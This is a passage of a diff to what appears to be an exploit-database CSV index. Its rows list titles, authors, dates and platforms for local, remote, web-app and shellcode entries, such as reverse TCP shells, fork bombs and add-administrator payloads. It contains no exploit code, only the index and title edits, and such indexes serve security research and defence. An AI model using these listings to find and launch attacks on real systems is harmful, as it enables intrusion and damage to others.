Overflow",2009-11-25,Rick2600,windows,local,0 10240,platforms/windows/local/10240.py,"Millenium MP3 Studio 2.0 - (pls) Buffer Overflow",2009-11-28,Molotov,windows,local,0 10244,platforms/windows/local/10244.txt,"MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Based Buffer Overflows",2009-11-28,"Christophe Devine",windows,local,0 -10255,platforms/bsd/local/10255.txt,"FreeBSD 8.0 Run-Time Link-Editor (rtld) - Privilege Escalation",2009-11-30,kingcope,bsd,local,0 +10255,platforms/bsd/local/10255.txt,"FreeBSD 8.0 Run-Time Link-Editor (RTLD) - Privilege Escalation",2009-11-30,kingcope,bsd,local,0 10264,platforms/multiple/local/10264.txt,"Oracle - SYS.LT.MERGEWORKSPACE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 10265,platforms/multiple/local/10265.txt,"Oracle - SYS.LT.COMPRESSWORKSPACETREE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 10266,platforms/multiple/local/10266.txt,"Oracle - ctxsys.drvxtabc.create_tables Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 @@ -7312,7 +7316,6 @@ id,file,description,date,author,platform,type,port 19125,platforms/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0 19126,platforms/solaris/local/19126.txt,"Sun Solaris 2.6 power management - Exploit",1998-07-16,"Ralf Lehmann",solaris,local,0 19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 sdtcm_convert - Exploit",1998-10-23,UNYUN,solaris,local,0 -19130,platforms/freebsd/local/19130.c,"FreeBSD 3.0 - UNIX-domain panic",1999-05-05,"Lukasz Luzar",freebsd,local,0 19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0 19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",multiple,local,0 19142,platforms/linux/local/19142.sh,"Oracle 8 - File Access",1999-05-06,"Kevin Wenchel",linux,local,0 @@ -7707,7 +7710,7 @@ id,file,description,date,author,platform,type,port 20338,platforms/linux/local/20338.c,"Samba 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,linux,local,0 20339,platforms/linux/local/20339.sh,"Samba 2.0.7 - SWAT Symlink (2)",2000-11-01,Optyx,linux,local,0 20341,platforms/linux/local/20341.sh,"Samba 2.0.7 - SWAT Logfile Permissions",2000-11-01,miah,linux,local,0 -20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x - top Format String",2000-11-01,truefinder,freebsd,local,0 +20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x /usr/bin/top - Format String",2000-11-01,truefinder,freebsd,local,0 20378,platforms/linux/local/20378.pl,"Debian top - Format String",2004-12-12,"Kevin Finisterre",linux,local,0 20380,platforms/unix/local/20380.c,"ManTrap 1.6.1 - Hidden Process Disclosure",2000-11-01,f8labs,unix,local,0 20381,platforms/unix/local/20381.c,"ManTrap 1.6.1 - Root Directory Inode Disclosure",2000-11-01,f8labs,unix,local,0 @@ -8722,7 +8725,6 @@ id,file,description,date,author,platform,type,port 36746,platforms/linux/local/36746.c,"Apport/Abrt (Ubuntu / Fedora) - Privilege Escalation",2015-04-14,"Tavis Ormandy",linux,local,0 36745,platforms/osx/local/36745.rb,"Apple Mac OSX - 'Rootpipe' Privilege Escalation (Metasploit)",2015-04-13,Metasploit,osx,local,0 36782,platforms/linux/local/36782.sh,"Apport 2.14.1 (Ubuntu 14.04.2) - Privilege Escalation",2015-04-17,"Ricardo F. Teixeira",linux,local,0 -36799,platforms/bsd/local/36799.c,"OpenBSD 5.6 - Multiple Local Kernel Panics",2015-04-21,nitr0us,bsd,local,0 36813,platforms/hardware/local/36813.txt,"ADB - Backup Archive File Overwrite Directory Traversal",2015-04-21,"Imre Rad",hardware,local,0 36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' Buffer Overflow (SEH) (2)",2015-04-22,"Tomislav Paskalev",windows,local,0 36820,platforms/linux/local/36820.txt,"usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0 @@ -9163,7 +9165,7 @@ id,file,description,date,author,platform,type,port 41763,platforms/linux/local/41763.txt,"Ubuntu 15.10 - 'USERNS ' Overlayfs Over Fuse Privilege Escalation",2016-11-22,halfdog,linux,local,0 41764,platforms/linux/local/41764.txt,"NTP - Privilege Escalation",2016-01-21,halfdog,linux,local,0 41765,platforms/linux/local/41765.txt,"Ubuntu 15.04 (Development) - 'Upstart' Logrotation Privilege Escalation",2015-03-12,halfdog,linux,local,0 -41766,platforms/linux/local/41766.txt,"Vm86 - Syscall Task Switch Kernel Panic / Privilege Escalation",2012-10-19,halfdog,linux,local,0 +41766,platforms/linux/local/41766.txt,"Vm86 - Syscall Task Switch Kernel Panic (Denial of Service) / Privilege Escalation",2012-10-19,halfdog,linux,local,0 41770,platforms/linux/local/41770.txt,"Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation",2011-01-17,halfdog,linux,local,0 41771,platforms/windows/local/41771.py,"Disk Sorter Enterprise 9.5.12 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0 41772,platforms/windows/local/41772.py,"DiskBoss Enterprise 7.8.16 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0 @@ -9276,16 +9278,17 @@ id,file,description,date,author,platform,type,port 42936,platforms/linux/local/42936.txt,"UCOPIA Wireless Appliance < 5.1.8 - Privilege Escalation",2017-10-02,Sysdream,linux,local,0 42937,platforms/linux/local/42937.txt,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,linux,local,0 42948,platforms/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",osx,local,0 +42951,platforms/windows/local/42951.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow",2017-10-03,C4t0ps1s,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 -5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 +5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow",2003-04-08,zillion,linux,remote,0 10,platforms/multiple/remote/10.c,"Samba < 2.2.8 (Linux/BSD) - Remote Code Execution",2003-04-10,eSDee,multiple,remote,139 16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Command Execution",2003-04-18,einstein,linux,remote,1723 18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution",2003-04-23,truff,linux,remote,0 19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution",2003-04-25,blightninjas,linux,remote,1723 -20,platforms/windows/remote/20.txt,"Microsoft Windows - SMB Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139 +20,platforms/windows/remote/20.txt,"Microsoft Windows 2000/XP - SMB Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139 23,platforms/windows/remote/23.c,"RealServer < 8.0.2 (Windows Platforms) - Remote Exploit",2003-04-30,"Johnny Cyberpunk",windows,remote,554 24,platforms/linux/remote/24.c,"Sendmail 8.12.8 (BSD) - 'Prescan()' Remote Command Execution",2003-04-30,bysin,linux,remote,25 25,platforms/linux/remote/25.c,"OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",linux,remote,0 @@ -9294,18 +9297,18 @@ id,file,description,date,author,platform,type,port 28,platforms/windows/remote/28.c,"Kerio Personal Firewall 2.1.4 - Remote Code Execution",2003-05-08,Burebista,windows,remote,0 30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 - Remote Command Execution",2003-05-12,anonymous,windows,remote,0 33,platforms/linux/remote/33.c,"WsMp3d 0.x - Heap Overflow",2003-05-22,Xpl017Elz,linux,remote,8000 -34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 - (Apache) Remote Exploit",2003-05-29,anonymous,linux,remote,80 +34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 (Apache) - Remote Exploit",2003-05-29,anonymous,linux,remote,80 36,platforms/windows/remote/36.c,"Microsoft Windows - WebDAV Remote Code Execution (2)",2003-06-01,alumni,windows,remote,80 37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0 38,platforms/linux/remote/38.pl,"Apache 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80 39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Command Execution",2003-06-10,gunzip,linux,remote,69 41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,linux,remote,80 -42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String",2003-06-11,ThreaT,windows,remote,25 +42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 Build 0402 - Remote Format String",2003-06-11,ThreaT,windows,remote,25 43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21 45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Exploit",2003-06-23,Rave,windows,remote,80 46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow",2003-06-27,B-r00t,linux,remote,25 48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80 -49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25 +49,platforms/linux/remote/49.c,"eXtremail 1.5.x (Linux) - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25 50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80 51,platforms/windows/remote/51.c,"Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 54,platforms/windows/remote/54.c,"LeapWare LeapFTP 2.7.x - Remote Buffer Overflow",2003-07-12,drG4njubas,windows,remote,21 @@ -9742,7 +9745,7 @@ id,file,description,date,author,platform,type,port 1799,platforms/multiple/remote/1799.txt,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Scanner",2006-05-17,class101,multiple,remote,0 1813,platforms/linux/remote/1813.c,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (1)",2006-05-21,kingcope,linux,remote,110 1862,platforms/cgi/remote/1862.c,"iShopCart - 'vGetPost()' Remote Buffer Overflow (CGI)",2006-06-02,K-sPecial,cgi,remote,0 -1885,platforms/windows/remote/1885.pl,"QBik WinGate WWW Proxy Server 6.1.1.1077 - (POST) Remote Buffer Overflow",2006-06-07,kingcope,windows,remote,80 +1885,platforms/windows/remote/1885.pl,"QBik WinGate WWW Proxy Server 6.1.1.1077 - 'POST' Remote Buffer Overflow",2006-06-07,kingcope,windows,remote,80 1889,platforms/hardware/remote/1889.txt,"D-Link DWL Series Access-Point 2.10na - Config Disclosure",2006-06-08,INTRUDERS,hardware,remote,0 1906,platforms/windows/remote/1906.py,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow",2006-06-12,h07,windows,remote,0 1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)",2006-06-15,c0rrupt,windows,remote,0 @@ -10316,7 +10319,7 @@ id,file,description,date,author,platform,type,port 6773,platforms/windows/remote/6773.html,"Hummingbird Deployment Wizard 2008 - ActiveX Command Execution",2008-10-17,shinnai,windows,remote,0 6774,platforms/windows/remote/6774.html,"Hummingbird Deployment Wizard 2008 - Registry Values Creation/Change",2008-10-17,shinnai,windows,remote,0 6776,platforms/windows/remote/6776.html,"Hummingbird Deployment Wizard 2008 - ActiveX File Execution(2)",2008-10-17,shinnai,windows,remote,0 -6786,platforms/solaris/remote/6786.pl,"Solaris 9 (UltraSPARC) - sadmind Remote Code Execution",2008-10-19,kingcope,solaris,remote,111 +6786,platforms/solaris/remote/6786.pl,"Solaris 9 (UltraSPARC) - 'sadmind' Remote Code Execution",2008-10-19,kingcope,solaris,remote,111 6793,platforms/windows/remote/6793.html,"Dart Communications PowerTCP FTP module - Remote Buffer Overflow",2008-10-20,InTeL,windows,remote,0 6801,platforms/windows/remote/6801.txt,"Opera 9.60 - Persistent Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0 6804,platforms/windows/remote/6804.pl,"GoodTech SSH - (SSH_FXP_OPEN) Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22 @@ -10516,7 +10519,7 @@ id,file,description,date,author,platform,type,port 9065,platforms/windows/remote/9065.c,"Green Dam - Remote Change System Time Exploit",2009-07-01,"Anti GD",windows,remote,0 9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure",2009-07-01,Septemb0x,hardware,remote,0 9093,platforms/windows/remote/9093.txt,"Microsoft Windows Live Messenger Plus! Fileserver 1.0 - Directory Traversal",2009-07-09,joepie91,windows,remote,0 -9096,platforms/windows/remote/9096.txt,"Sun One WebServer 6.1 - JSP Source Viewing",2009-07-09,kingcope,windows,remote,0 +9096,platforms/windows/remote/9096.txt,"Sun One WebServer 6.1 - .JSP Source Viewing",2009-07-09,kingcope,windows,remote,0 9106,platforms/windows/remote/9106.txt,"citrix xencenterweb - Cross-Site Scripting / SQL Injection / Remote Code Execution",2009-07-10,"Secure Network",windows,remote,0 9108,platforms/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video - ActiveX Remote Buffer Overflow",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0 9117,platforms/hardware/remote/9117.txt,"HTC / Windows Mobile OBEX FTP Service - Directory Traversal",2009-07-10,"Alberto Tablado",hardware,remote,0 @@ -11928,7 +11931,6 @@ id,file,description,date,author,platform,type,port 19495,platforms/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 19496,platforms/windows/remote/19496.c,"FuseWare FuseMail 2.7 - POP Mail Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - 'snprintf' Remote Root Exploit",1999-09-17,"Tymm Twillman",linux,remote,0 -19507,platforms/solaris/remote/19507.txt,"Solaris 7.0 - Recursive mutex_enter Panic",1999-09-23,"David Brumley",solaris,remote,0 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19520,platforms/bsd/remote/19520.txt,"BSD TelnetD - Remote Command Execution (2)",2012-07-01,kingcope,bsd,remote,0 @@ -13201,7 +13203,7 @@ id,file,description,date,author,platform,type,port 23080,platforms/windows/remote/23080.txt,"freeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0 23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Unauthenticated User Enumeration",2012-12-02,kingcope,multiple,remote,0 23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit",2012-12-02,kingcope,linux,remote,0 -23083,platforms/windows/remote/23083.txt,"MySQL - Windows Remote System Level Exploit (Stuxnet technique)",2012-12-02,kingcope,windows,remote,0 +23083,platforms/windows/remote/23083.txt,"MySQL - 'Stuxnet Technique' Windows Remote System Exploit",2012-12-02,kingcope,windows,remote,0 23091,platforms/windows/remote/23091.txt,"FloosieTek FTGatePro 1.22 - Mail Server Full Path Disclosure",2003-09-02,"Ziv Kamir",windows,remote,0 23092,platforms/windows/remote/23092.txt,"FloosieTek FTGatePro 1.22 - Mail Server Cross-Site Scripting",2003-09-02,"Ziv Kamir",windows,remote,0 23093,platforms/windows/remote/23093.txt,"Microsoft Windows XP - TCP Packet Information Leakage",2003-09-02,"Michal Zalewski",windows,remote,0 @@ -14151,7 +14153,7 @@ id,file,description,date,author,platform,type,port 29290,platforms/php/remote/29290.c,"Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution",2013-10-29,kingcope,php,remote,80 29302,platforms/linux/remote/29302.txt,"Mono XSP 1.x/2.0 - Source Code Information Disclosure",2006-12-20,jose.palanco,linux,remote,0 29316,platforms/php/remote/29316.py,"Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner)",2013-10-31,noptrix,php,remote,0 -29319,platforms/php/remote/29319.rb,"vTigerCRM 5.3.0 5.4.0 - Authenticated Remote Code Execution (Metasploit)",2013-10-31,Metasploit,php,remote,80 +29319,platforms/php/remote/29319.rb,"vTiger CRM 5.3.0 5.4.0 - Authenticated Remote Code Execution (Metasploit)",2013-10-31,Metasploit,php,remote,80 29320,platforms/php/remote/29320.rb,"NAS4Free - Remote Code Execution (Metasploit)",2013-10-31,Metasploit,php,remote,80 29321,platforms/linux/remote/29321.rb,"Zabbix - Authenticated Remote Command Execution (Metasploit)",2013-10-31,Metasploit,linux,remote,80 29322,platforms/php/remote/29322.rb,"ISPConfig - Authenticated Arbitrary PHP Code Execution (Metasploit)",2013-10-31,Metasploit,php,remote,80 @@ -14364,7 +14366,7 @@ id,file,description,date,author,platform,type,port 30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0 30781,platforms/osx/remote/30781.txt,"Apple Mac OSX 10.5.x - Mail Arbitrary Code Execution",2007-11-20,"heise Security",osx,remote,0 31026,platforms/hardware/remote/31026.pl,"Fortinet Fortigate - CRLF Characters URL Filtering Bypass",2008-01-14,Danux,hardware,remote,0 -30787,platforms/php/remote/30787.rb,"vTiger CRM SOAP AddEmailAttachment - Arbitrary File Upload (Metasploit)",2014-01-07,Metasploit,php,remote,80 +30787,platforms/php/remote/30787.rb,"vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasploit)",2014-01-07,Metasploit,php,remote,80 30816,platforms/windows/remote/30816.py,"Autonomy KeyView Lotus 1-2-3 - File Multiple Buffer Overflow Vulnerabilities",2007-11-26,Sebastian,windows,remote,0 30819,platforms/windows/remote/30819.c,"Tencent QQ 2006 LaunchP2PShare - Multiple Stack Buffer Overflow Vulnerabilities",2007-11-27,axis,windows,remote,0 30833,platforms/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN - My.Logon.php3 Cross-Site Scripting",2007-11-30,"Richard Brain",hardware,remote,0 @@ -15887,6 +15889,7 @@ id,file,description,date,author,platform,type,port 42928,platforms/windows/remote/42928.py,"Sync Breeze Enterprise 10.0.28 - Buffer Overflow",2017-09-30,"Owais Mehtab",windows,remote,0 42938,platforms/linux/remote/42938.rb,"Qmail SMTP - Bash Environment Variable Injection (Metasploit)",2017-10-02,Metasploit,linux,remote,0 42949,platforms/linux/remote/42949.txt,"UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Unauthenticated Root Remote Code Execution",2017-10-02,agix,linux,remote,0 +42952,platforms/windows/remote/42952.py,"ERS Data System 1.8.1 - Java Deserialization",2017-09-21,"West Shepherd",windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -16293,7 +16296,7 @@ id,file,description,date,author,platform,type,port 15063,platforms/win_x86/shellcode/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,win_x86,shellcode,0 15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0 15136,platforms/windows/shellcode/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",windows,shellcode,0 -15202,platforms/win_x86/shellcode/15202.c,"Windows XP Professional SP3 (English) x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0 +15202,platforms/win_x86/shellcode/15202.c,"Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0 15203,platforms/win_x86/shellcode/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0 15314,platforms/arm/shellcode/15314.asm,"ARM - Bind TCP Shell (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15315,platforms/arm/shellcode/15315.asm,"ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 @@ -16530,12 +16533,12 @@ id,file,description,date,author,platform,type,port 42339,platforms/lin_x86-64/shellcode/42339.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,lin_x86-64,shellcode,0 42428,platforms/lin_x86/shellcode/42428.c,"Linux x86 - execve /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",lin_x86,shellcode,0 42485,platforms/lin_x86-64/shellcode/42485.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",lin_x86-64,shellcode,0 -42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86_64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0 -42523,platforms/lin_x86-64/shellcode/42523.c,"Linux/x86_64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0 +42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0 +42523,platforms/lin_x86-64/shellcode/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0 42594,platforms/lin_x86/shellcode/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",lin_x86,shellcode,0 42646,platforms/arm/shellcode/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0 42647,platforms/arm/shellcode/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0 -42791,platforms/lin_x86-64/shellcode/42791.c,"Linux/x86_64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",lin_x86-64,shellcode,0 +42791,platforms/lin_x86-64/shellcode/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",lin_x86-64,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -17470,7 +17473,7 @@ id,file,description,date,author,platform,type,port 2505,platforms/php/webapps/2505.txt,"JASmine 0.0.2 - 'index.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 2506,platforms/php/webapps/2506.txt,"Foafgen 0.3 - 'redir.php' Local Source Disclosure",2006-10-10,DarkFig,php,webapps,0 2507,platforms/php/webapps/2507.txt,"Album Photo Sans Nom 1.6 - Remote Source Disclosure",2006-10-10,DarkFig,php,webapps,0 -2508,platforms/php/webapps/2508.txt,"vtiger CRM 4.2 - (calpath) Multiple Remote File Inclusion",2006-10-10,the_day,php,webapps,0 +2508,platforms/php/webapps/2508.txt,"vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusion",2006-10-10,the_day,php,webapps,0 2509,platforms/php/webapps/2509.txt,"Exhibit Engine 1.5 RC 4 - 'photo_comment.php' File Inclusion",2006-10-10,Kacper,php,webapps,0 2510,platforms/php/webapps/2510.txt,"Claroline 1.8.0 rc1 - 'import.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 2511,platforms/php/webapps/2511.txt,"PHPLibrary 1.5.3 - 'grid3.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 @@ -21567,7 +21570,7 @@ id,file,description,date,author,platform,type,port 8395,platforms/php/webapps/8395.txt,"RedaxScript 0.2.0 - 'Language' Local File Inclusion",2009-04-10,SirGod,php,webapps,0 8396,platforms/php/webapps/8396.pl,"w3bcms Gaestebuch 3.0.0 - Blind SQL Injection",2009-04-10,DNX,php,webapps,0 8397,platforms/asp/webapps/8397.txt,"FunkyASP AD System 1.1 - Arbitrary File Upload",2009-04-10,ZoRLu,asp,webapps,0 -8399,platforms/php/webapps/8399.pl,"Flatnuke 2.7.1 - (level) Privilege Escalation",2009-04-13,StAkeR,php,webapps,0 +8399,platforms/php/webapps/8399.pl,"Flatnuke 2.7.1 - 'level' Privilege Escalation",2009-04-13,StAkeR,php,webapps,0 8408,platforms/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 - Admin Access",2009-04-13,THUNDER,php,webapps,0 8409,platforms/php/webapps/8409.txt,"Yellow Duck Weblog 2.1.0 - 'lang' Local File Inclusion",2009-04-13,ahmadbady,php,webapps,0 8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - Authentication Bypass",2009-04-13,Dr-HTmL,php,webapps,0 @@ -22205,7 +22208,7 @@ id,file,description,date,author,platform,type,port 9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection",2009-08-18,"Khashayar Fereidani",php,webapps,0 9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - 'id' Parameter SQL Injection",2009-08-18,NoGe,php,webapps,0 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0 -9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,php,webapps,0 +9450,platforms/php/webapps/9450.txt,"vTiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,php,webapps,0 9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' Parameter SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - 'article' Parameter Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - 'UploadID' SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 @@ -24745,7 +24748,7 @@ id,file,description,date,author,platform,type,port 15173,platforms/php/webapps/15173.txt,"phpMyShopping 1.0.1505 - Multiple Vulnerabilities",2010-10-01,Metropolis,php,webapps,0 15171,platforms/php/webapps/15171.txt,"jCart 1.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery/Open Redirect Vulnerabilities",2010-10-01,p0deje,php,webapps,0 15175,platforms/php/webapps/15175.txt,"Chipmunk Board 1.3 - 'index.php?forumID' SQL Injection",2010-10-01,Shamus,php,webapps,0 -15199,platforms/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure 